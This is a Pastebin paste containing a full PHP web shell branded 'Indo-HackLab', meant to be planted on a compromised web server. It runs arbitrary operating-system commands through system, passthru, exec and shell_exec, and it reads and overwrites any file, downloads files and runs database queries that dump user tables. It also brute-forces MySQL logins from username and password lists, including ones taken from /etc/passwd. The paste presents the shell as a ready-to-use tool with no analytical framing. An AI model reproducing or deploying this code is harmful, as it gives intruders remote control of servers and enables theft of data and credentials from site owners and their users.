API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 10th, 2016
127
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 24.10 KB | None | 0 0
raw download clone embed print report
  1.  
  2. <html>
  3. <SCRIPT language='JavaScript'>
  4. var txt="01001000 01100001 01100011 01101011 0100001 ";
  5. var kecepatan=170;var segarkan=null;function bergerak() { document.title=txt;
  6. txt=txt.substring(1,txt.length)+txt.charAt(0);
  7. segarkan=setTimeout("bergerak()",kecepatan);}bergerak();
  8. </SCRIPT>
  9. <link rel="shortcut icon" href="http://s18.postimg.org/hzuzfnkg5/ssic.png" type="image/ico" />
  10. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  11. <?php
  12. @set_time_limit(0);
  13. @error_reporting(0);
  14. echo '<head>
  15. <style>
  16. body,td,th {font-family: Console;font-size: 13px;color: #ffffff;font-weight: bold;}
  17. /*.SSIC{ font-family:Courier;font-size:20px;color: #00FF00;}*/
  18. input {BORDER-RIGHT:dashed 1px #696969;BORDER-TOP:dashed 1px #696969;BORDER-LEFT:dashed 1px #696969;BORDER-BOTTOM: dashed 1px #696969;BACKGROUND-COLOR: #111111;COLOR: #ffffff;font: 8pt Verdana;}
  19. select {BORDER-RIGHT:dashed 1px #696969;BORDER-TOP:dashed 1px #696969;BORDER-LEFT:dashed 1px #696969;BORDER-BOTTOM: dashed 1px #696969;BACKGROUND-COLOR: #111111;COLOR: #ffffff;font: 8pt Verdana;}
  20. submit {BORDER-RIGHT:buttonhighlight 2px outset;BORDER-TOP:buttonhighlight 2px outset;BORDER-LEFT:buttonhighlight 2px outset;BORDER-BOTTOM: buttonhighlight 2px outset;BACKGROUND-COLOR: #000099;COLOR: #FFFF00;width: 30%;}
  21. textarea {BORDER-RIGHT:dashed 1px #696969;BORDER-TOP:dashed 1px #696969;BORDER-LEFT:dashed 1px #696969;BORDER-BOTTOM: dashed 1px #696969;BACKGROUND-COLOR: #111111;COLOR: #ffffff;font: Fixedsys bold;}
  22. BODY {margin-top: 1px;margin-right: 1px;margin-bottom: 1px;margin-left: 1px;SCROLLBAR-FACE-COLOR: #111111; SCROLLBAR-HIGHLIGHT-COLOR: #111111;SCROLLBAR-ARROW-COLOR: #c5c5c5;SCROLLBAR-BASE-COLOR: #253546;BACKGROUND-COLOR: #000000;}
  23. </style>
  24. </head>
  25. ';
  26. function in($type,$name,$size,$value,$checked=0)
  27. {
  28. $ret = "<input type=".$type." name=".$name." "; if($size != 0)
  29. {
  30. $ret .= "size=".$size." "; }
  31. $ret .= "value=\"".$value."\""; if($checked) $ret .= " checked"; return $ret.">"; }
  32.  
  33. class my_sql
  34. {
  35. var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect()
  36. {
  37. switch($this->db)
  38. {
  39. case 'MySQL': if(empty($this->port))
  40. {
  41. $this->port = '3306'; }
  42. if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(empty($this->port))
  43. {
  44. $this->port = '1433'; }
  45. if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; $this->error = "Can't connect to server"; break; case 'PostgreSQL': if(empty($this->port))
  46. {
  47. $this->port = '5432'; }
  48. $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; $this->error = @pg_last_error($this->connection); break; case 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; $error = @ocierror(); $this->error=$error['message']; break; }
  49. return 0; }
  50. function select_db()
  51. {
  52. switch($this->db)
  53. {
  54. case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; $this->error = "Can't select database"; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; }
  55. return 0; }
  56. function query($query)
  57. {
  58. $this->res=$this->error=''; switch($this->db)
  59. {
  60. case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
  61. {
  62. $this->error = @mysql_error($this->connection); return 0; }
  63. else if(is_resource($this->res))
  64. {
  65. return 1; }
  66. return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection)))
  67. {
  68. $this->error = 'Query error'; return 0; }
  69. else if(@mssql_num_rows($this->res) > 0)
  70. {
  71. return 1; }
  72. return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query)))
  73. {
  74. $this->error = @pg_last_error($this->connection); return 0; }
  75. else if(@pg_num_rows($this->res) > 0)
  76. {
  77. return 1; }
  78. return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query)))
  79. {
  80. $this->error = 'Query parse error'; }
  81. else
  82. {
  83. if(@ociexecute($this->res))
  84. {
  85. if(@ocirowcount($this->res) != 0) return 2; return 1; }
  86. $error = @ocierror(); $this->error=$error['message']; }
  87. break; }
  88. return 0; }
  89. function get_result()
  90. {
  91. $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db)
  92. {
  93. case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows)
  94. {
  95. $this->columns = @array_keys($this->rows[0]); return 1;}
  96. break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows)
  97. {
  98. $this->columns = @array_keys($this->rows[0]); return 1;}
  99. ; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows)
  100. {
  101. $this->columns = @array_keys($this->rows[0]); return 1;}
  102. break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows)
  103. {
  104. $this->columns = @array_keys($this->rows[0]); return 1;}
  105. break; }
  106. return 0; }
  107. function dump($table)
  108. {
  109. if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '## Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db)
  110. {
  111. case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table'].";"; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
  112. {
  113. foreach($this->rows[$i] as $k=>$v)
  114. {
  115. $this->rows[$i][$k] = @mysql_real_escape_string($v);}
  116. $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
  117. break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
  118. {
  119. foreach($this->rows[$i] as $k=>$v)
  120. {
  121. $this->rows[$i][$k] = @addslashes($v);}
  122. $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
  123. break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
  124. {
  125. foreach($this->rows[$i] as $k=>$v)
  126. {
  127. $this->rows[$i][$k] = @addslashes($v);}
  128. $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
  129. break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## under construction'; break; default: return 0; break; }
  130. return 1; }
  131. function close()
  132. {
  133. switch($this->db)
  134. {
  135. case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; }
  136. }
  137. function affected_rows()
  138. {
  139. switch($this->db)
  140. {
  141. case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; }
  142. }
  143. }
  144. if(!empty($_POST['cccc']) && $_POST['cccc']=="download_file" && !empty($_POST['d_name']))
  145. {
  146. if(!$file=@fopen($_POST['d_name'],"r"))
  147. {
  148. err(1,$_POST['d_name']); $_POST['cccc']=""; }
  149. else
  150. {
  151. @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding))
  152. {
  153. header('Content-Encoding: ' . $content_encoding); }
  154. header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); }
  155. }
  156. if(isset($_GET['phpinfo']))
  157. {
  158. echo @phpinfo(); echo "<br><div align=center><font face=Courier New size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  159. if (!empty($_POST['cccc']) && $_POST['cccc']=="db_query")
  160. {
  161. echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo '<body bgcolor=black>'; if(!$sql->connect()) echo "<div align=center><font face=Courier New size=-2 color=red><b>".$sql->error."</b></font></div>"; else
  162. {
  163. if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Courier New size=-2 color=red><b>".$sql->error."</b></font></div>"; else
  164. {
  165. foreach($querys as $num=>$query)
  166. {
  167. if(strlen($query)>5)
  168. {
  169. echo "<font face=Courier New size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query))
  170. {
  171. case '0': echo "<table width=100%><tr><td><font face=Courier New size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result())
  172. {
  173. echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=black><font face=Courier New size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=black><font face=Courier New size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++)
  174. {
  175. foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Courier New size=-2>&nbsp;",$sql->rows[$i]); echo '<tr><td><font face=Courier New size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; }
  176. echo "</table>"; }
  177. break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Courier New size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; }
  178. }
  179. }
  180. }
  181. }
  182. echo "<br><title>Indo-HackLab</title><form name=form method=POST>";
  183. echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cccc',0,'db_query');
  184. echo "<div align=center>"; echo "<font face=Courier New size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Courier New size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  185. function ccmmdd($ccmmdd2,$att)
  186. {
  187. global $ccmmdd2,$att;
  188. echo '
  189. <table style="width: 100%" class="style1" dir="rtl">
  190. <tr>
  191. <td class="style9"><strong>&#227;&#230;&#204;&#201; &#199;&#225;&#195;&#230;&#227;&#209;</strong></td>
  192. </tr>
  193. <tr>
  194. <td class="style13">
  195. <form method="post">
  196. <select name="att" dir="rtl" style="height: 109px" size="6">
  197. ';
  198. if($_POST['att']==null)
  199. {
  200. echo ' <option value="system" selected="">system</option>';
  201. }else{
  202. echo " <option value='$_POST[att]' selected=''>$_POST[att]</option>
  203. <option value=system>system</option>
  204. ";
  205.  
  206.  
  207. }
  208.  
  209. echo '
  210. <option value="passthru">passthru</option>
  211. <option value="exec">exec</option>
  212. <option value="shell_exec">shell_exec</option>
  213. </select>
  214. <input name="page" value="ccmmdd" type="hidden"><br>
  215. <input dir="ltr" name="ccmmdd2" style="width: 173px" type="text" value="';if(!$_POST['ccmmdd2']){echo 'dir';}else{echo $_POST['ccmmdd2'];}echo '"><br>
  216. <input type="submit" value="&#202;&#228;&#221;&#237;&#208;">
  217. </form>
  218.  
  219. </td>
  220. </tr>
  221. <tr>
  222. <td class="style13">
  223. ';
  224.  
  225. if($_POST[att]=='system')
  226. {
  227. echo '
  228. <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  229. system($_POST['ccmmdd2']);
  230. echo ' </textarea>';
  231.  
  232.  
  233. }
  234.  
  235. if($_POST[att]=='passthru')
  236. {
  237. echo '
  238. <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  239. passthru($_POST['ccmmdd2']);
  240. echo ' </textarea>';
  241.  
  242.  
  243. }
  244.  
  245.  
  246.  
  247.  
  248.  
  249. if($_POST[att]=='exec')
  250. {
  251.  
  252. echo ' <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  253. exec($_POST['ccmmdd2'],$res);
  254. echo $res = join("\n",$res);
  255. echo ' </textarea>';
  256.  
  257.  
  258. }
  259.  
  260.  
  261.  
  262.  
  263.  
  264.  
  265.  
  266. if($_POST[att]=='shell_exec')
  267. {
  268.  
  269. echo ' <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  270. echo shell_exec($_POST['ccmmdd2']);
  271. echo ' </textarea>';
  272.  
  273.  
  274. }
  275. echo '
  276. </td>
  277. </tr>
  278. </table>
  279. ';
  280.  
  281. exit;
  282. }
  283.  
  284. if($_POST['page']=='edit')
  285. {
  286.  
  287. $code=@str_replace("\r\n","\n",$_POST['code']);
  288. $code=@str_replace('\\','',$code);
  289. $fp = fopen($pathclass, 'w');
  290. fwrite($fp,"$code");
  291. fclose($fp);
  292. echo "<center><b>OK Edit<br><br><br><br><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  293. exit;
  294. }
  295. if($_POST['page']=='show')
  296. {
  297. $pathclass =$_POST['pathclass'];
  298. echo '
  299. <form method="POST">
  300. <input type="hidden" name="page" value="edit">
  301. ';
  302.  
  303. $sahacker = fopen($pathclass, "rb");
  304. echo '<center>'.$pathclass.'<br><textarea dir="ltr" name="code" style="width: 845px; height: 404px">';
  305. $code = fread($sahacker, filesize($pathclass));
  306. echo $code =htmlspecialchars($code);
  307. echo '</textarea>';
  308. fclose($sahacker);
  309. echo '
  310. <br><input type="text" name="pathclass" value="'.$pathclass.'" style="width: 445px;">
  311. <br><strong><input type="submit" value="edit file">
  312. </form>
  313. ';
  314. exit;
  315. }
  316.  
  317.  
  318.  
  319.  
  320. if($_POST['page']=='ccmmdd')
  321. {
  322. echo ccmmdd($ccmmdd2,$att);
  323. exit;
  324. }
  325. if($_POST['page']=='find')
  326. {
  327. if(isset($_POST['usernames']) && isset($_POST['passwords']))
  328. {
  329. if($_POST['type'] == 'passwd'){
  330. $e = explode("\n",$_POST['usernames']);
  331. foreach($e as $value){
  332. $k = explode(":",$value);
  333. $username .= $k['0']." ";
  334. }
  335. }elseif($_POST['type'] == 'simple'){
  336. $username = str_replace("\n",' ',$_POST['usernames']);
  337. }
  338. $a1 = explode(" ",$username);
  339. $a2 = explode("\n",$_POST['passwords']);
  340. $id2 = count($a2);
  341. $ok = 0;
  342. foreach($a1 as $user )
  343. {
  344. if($user !== '')
  345. {
  346. $user=trim($user);
  347. for($i=0;$i<=$id2;$i++)
  348. {
  349. $pass = trim($a2[$i]);
  350. if(@mysql_connect('localhost',$user,$pass))
  351. {
  352. echo "Indo|Hacklab~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";
  353. $ok++;
  354. }
  355. }
  356. }
  357. }
  358. echo "<hr><b>You Found <font color=green>$ok</font> Cpanel By Indo|HackLab</b>";
  359. echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  360. exit;
  361. }
  362. }
  363. ?>
  364. <form method="POST" target="_blank">
  365. <strong>
  366. <input name="page" type="hidden" value="find">
  367. </strong>
  368. <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
  369. <tr>
  370. <td valign="top" bgcolor="black"><center>
  371. <pre style="margin-bottom: 0;">
  372. ( ) (
  373. )\ ) ( ( /( ) )\ ) )
  374. (()/( )\ ) )\()) ) ( /((()/( ) ( /(
  375. /(_))( (()/( ( ((_)\ ( /( ( )\())/(_))( /( )\())
  376. (_)) )\ ) ((_)))\ _((_))(_)) )\((_)\(_)) )(_)|(_)\
  377. |_ _|_(_/( _| |((_) || ((_)_ ((_) |(_) | ((_)_| |(_)
  378. | || ' \)) _` / _ \ __ / _` / _|| / /| |__/ _` | '_ \
  379. |___|_||_|\__,_\___/_||_\__,_\__||_\_\|____\__,_|_.__/
  380. </pre><font face="courier">./Indo-HackLab</font></center></td>
  381. </tr>
  382. <tr>
  383. <td>
  384. <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
  385. <td valign="top" bgcolor="black" style="width: 139px">
  386. <strong><font face="courier">User :</font></strong></td>
  387. <td valign="top" bgcolor="black" colspan="5"><strong><textarea cols="40" rows="10" name="usernames"></textarea></strong></td>
  388. </tr>
  389. <tr>
  390. <td valign="top" bgcolor="black" style="width: 139px">
  391. <strong><font face="courier">Pass :</font></strong></td>
  392. <td valign="top" bgcolor="black" colspan="5"><strong><textarea cols="40" rows="10" name="passwords"></textarea></strong></td>
  393. </tr>
  394. <tr>
  395. <td valign="top" bgcolor="black" style="width: 139px">
  396. <strong><font face="courier">Type :</font></strong></td>
  397. <td valign="top" bgcolor="black" colspan="5">
  398. <span><strong><font face="courier">Simple : </font></strong> </span>
  399. <strong>
  400. <input type="radio" name="type" value="simple" checked="checked"></strong>
  401. <strong><font face="courier">/etc/passwd : </strong> </font>
  402. <strong>
  403. <input type="radio" name="type" value="passwd"></strong><span><strong>
  404. </strong>
  405. </span>
  406. </td>
  407. </tr>
  408. <tr>
  409. <td valign="top" bgcolor="black" style="width: 139px"></td>
  410. <td valign="top" bgcolor="black" colspan="5"><strong><input type="submit" value="start">
  411. </strong>
  412. </td>
  413. <tr>
  414. </form>
  415.  
  416. <td valign="top" colspan="6"><strong></strong></td>
  417.  
  418. <form method="POST" target="_blank">
  419. <strong>
  420. <input type="hidden" name="go" value="cmd_mysql">
  421. </strong>
  422. <tr>
  423. <td valign="top" bgcolor="black" class="style1" colspan="6"><strong><font face="courier">CMD MYSQL</font></strong></td>
  424. </tr>
  425. <tr>
  426. <td valign="top" bgcolor="black" style="width: 139px"><strong><font face="courier">user</font></strong></td>
  427. <td valign="top" bgcolor="black"><strong><input name="mysql_l" type="text"></strong></td>
  428. <td valign="top" bgcolor="black"><strong><font face="courier">pass</font></strong></td>
  429. <td valign="top" bgcolor="black"><strong><input name="mysql_p" type="text"></strong></td>
  430. <td valign="top" bgcolor="black"><strong><font face="courier">database</font></strong></td>
  431. <td valign="top" bgcolor="black"><strong><input name="mysql_db" type="text"></strong></td>
  432. </tr>
  433. <tr>
  434. <td valign="top" bgcolor="black" style="height: 25px; width: 139px;">
  435. <strong><font face="courier">cmd ~</font></strong></td>
  436. <td valign="top" bgcolor="black" colspan="5" style="height: 25px">
  437. <strong>
  438. <textarea name="db_query" style="width: 353px; height: 89px">SHOW DATABASES;
  439. SHOW TABLES user_vb ;
  440. SELECT * FROM user;
  441. SELECT version();
  442. SELECT user();</textarea></strong></td>
  443. </tr>
  444. <tr>
  445. <td valign="top" bgcolor="black" style="width: 139px"><strong></strong></td>
  446. <td valign="top" bgcolor="black" colspan="5"><strong><input type="submit" value="run"></strong></td>
  447. </tr>
  448. <input name="db" value="MySQL" type="hidden">
  449. <input name="db_server" type="hidden" value="localhost">
  450. <input name="db_port" type="hidden" value="3306">
  451. <input name="cccc" type="hidden" value="db_query">
  452.  
  453. </form>
  454. <tr>
  455. <td valign="top" bgcolor="black" colspan="6"><strong></strong></td>
  456.  
  457.  
  458. </tr>
  459.  
  460. <form method="POST" target="_blank">
  461. <tr>
  462. <td valign="top" bgcolor="black" class="style1" colspan="6"><strong><font face="courier">CMD
  463. system - passthru - exec - shell_exec</font></strong></td>
  464. </tr>
  465. <tr>
  466. <td valign="top" bgcolor="black" style="width: 139px"><strong><font face="courier">cmd ~</font></strong></td>
  467. <td valign="top" bgcolor="black" colspan="5">
  468. <select name="att" dir="rtl" size="1">
  469. <?php
  470. if($_POST['att']==null)
  471. {
  472. echo '<option value="system" selected="">system</option>';
  473. }else{
  474. echo "<option value='$_POST[att]' selected=''>$_POST[att]</option><option value=system>system</option>";
  475. }
  476. ?>
  477. <option value="passthru">passthru</option>
  478. <option value="exec">exec</option>
  479. <option value="shell_exec">shell_exec</option>
  480. </select>
  481. <strong>
  482. <input name="page" type="hidden" value="ccmmdd">
  483. <input name="ccmmdd2" type="text" style="width: 284px" value="ls -la"></strong></td>
  484. </tr>
  485. <tr>
  486. <td valign="top" bgcolor="black" style="width: 139px"><strong></strong></td>
  487. <td valign="top" bgcolor="black" colspan="5"><strong><input type="submit" value="go"></strong></td>
  488. </tr>
  489. </form>
  490. <form method="POST" target="_blank">
  491. <tr>
  492. <td valign="top" bgcolor="black" class="style1" colspan="6"><strong><font face="courier">Show File And Edit</font></strong></td>
  493. </tr>
  494. <tr>
  495. <td valign="top" bgcolor="black" style="width: 139px"><strong><font face="courier">Path ~</font></strong></td>
  496. <td valign="top" bgcolor="black" colspan="5">
  497. <strong>
  498. <input name="pathclass" type="text" style="width: 284px" value="<?php echo realpath('')?>"></strong></td>
  499. </tr>
  500. <tr>
  501. <td valign="top" bgcolor="black" style="width: 139px"><strong></strong></td>
  502. <td valign="top" bgcolor="black" colspan="5"><strong><input type="submit" value="show"></strong></td>
  503. </tr>
  504. <input name="page" type="hidden" value="show">
  505. </form>
  506. <tr>
  507. <td valign="top" bgcolor="black" class="style1" colspan="6"><strong><font face="courier">Info Security</font></strong></td>
  508. </tr>
  509. <tr>
  510. <td valign="top" bgcolor="black" style="width: 139px"><strong><font face="courier">Safe Mode</font></strong></td>
  511. <td valign="top" bgcolor="black" colspan="5">
  512. <strong>
  513. <?php
  514. $safe_mode = ini_get('safe_mode');
  515. if($safe_mode=='1')
  516. {
  517. echo 'ON';
  518. }else{
  519. echo 'OFF';
  520. }
  521.  
  522. ?>
  523. </strong>
  524. </td>
  525. </tr>
  526. <tr>
  527. <td valign="top" bgcolor="black" style="width: 139px"><strong><font face="courier">Function</font></strong></td>
  528. <td valign="top" bgcolor="black" colspan="5">
  529. <strong>
  530. <?php
  531. if(''==($func=@ini_get('disable_functions')))
  532. {
  533. echo "<font color=#00800F>Indo|HackLab</font></b>";
  534. }else{
  535. echo "<font color=red>$func</font></b>";
  536. }
  537. ?></strong></td>
  538. <tr>
  539. <td valign="top" bgcolor="black" style="width: 139px"><strong></strong></td>
  540. <td valign="top" bgcolor="black" colspan="5"><strong></strong></td>
  541. </table>
  542. </td>
  543. </tr>
  544. </table>
  545. <meta http-equiv="content-type" content="text/html; charset=UTF-8"></head><body></body></html>
  546. <form style="border: 0px ridge grey">
  547. <p align="center"></td>
  548. </tr><div align="center">
  549. <tr>
  550. <input type="submit" name="user" value="user"><option value="name"></select>
  551. </form>
  552. <div align="center">
  553. <table border="5" width="10%" bordercolorlight="grey" bordercolordark="black" height="100" cellspacing="5">
  554. <tr>
  555. <td bordercolorlight="grey" bordercolordark="grey">
  556. <p align="left">
  557. <textarea method='POST' rows="25" name="S1" cols="16">
  558.  
  559.  
  560. <?php
  561. if ($_GET['user'] )
  562. system('ls /var/mail');
  563. for($uid=0;$uid<90000;$uid++){
  564.  
  565. }
  566. ?></textarea>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!